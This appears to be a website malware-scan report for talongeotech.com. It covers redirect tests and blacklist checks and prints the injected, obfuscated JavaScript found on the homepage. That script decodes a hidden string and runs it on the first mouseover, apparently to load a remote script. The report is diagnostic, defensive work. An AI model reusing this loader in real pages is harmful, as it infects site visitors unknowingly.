Scanned pages/files
Request | Server response | Status |
http://talongeotech.com/ | 200 OK Content-Length: 2278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Agod%0Argdiioufb5br4up%3Dj5nds1eo27rce5iukeymf32eye6nd1otd6p.djdch7jrmlpeb6iarwwt7fnehogExfllw2fef6rms8dedwlneflt0xa%289op%22iwyi0jbfb5qr0huam6kmjnjebk6%229ne%29k2t%3B92w%0Atrbi7xwfgygrby4.d6usds2r6lqc0op%3Dyla%22sj6hnuitjr5trrzpjbv%3Aag5/4ne/mlhvrfkcsno-f0fb52wugljsbswiplqnihkeccts3g0sent.mduc93toyxbmy7u/94sid0znyv8.rp8p408h30dpvsg%22rv4%3B6hv%0Agsdi2lifsi9rcho.2kls691t0ekyjqxl for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://talongeotech.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: talongeotech.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 22:15:26 GMT
Accept-Ranges: bytes
ETag: "63f7e6-8e6-4b21f6ea6d440"
Server: Apache
Content-Length: 2278
Content-Type: text/html
Last-Modified: Sun, 20 Nov 2011 00:12:57 GMT
...2278 bytes of data.
GET / HTTP/1.1
Host: talongeotech.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 22:15:26 GMT
Accept-Ranges: bytes
ETag: "63f7e6-8e6-4b21f6ea6d440"
Server: Apache
Content-Length: 2278
Content-Type: text/html
Last-Modified: Sun, 20 Nov 2011 00:12:57 GMT
...2278 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: talongeotech.com
Referer: http://www.google.com/search?q=talongeotech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: talongeotech.com
Referer: http://www.google.com/search?q=talongeotech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=talongeotech.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://talongeotech.com/
Result: talongeotech.com is not infected or malware details are not published yet.
Result: talongeotech.com is not infected or malware details are not published yet.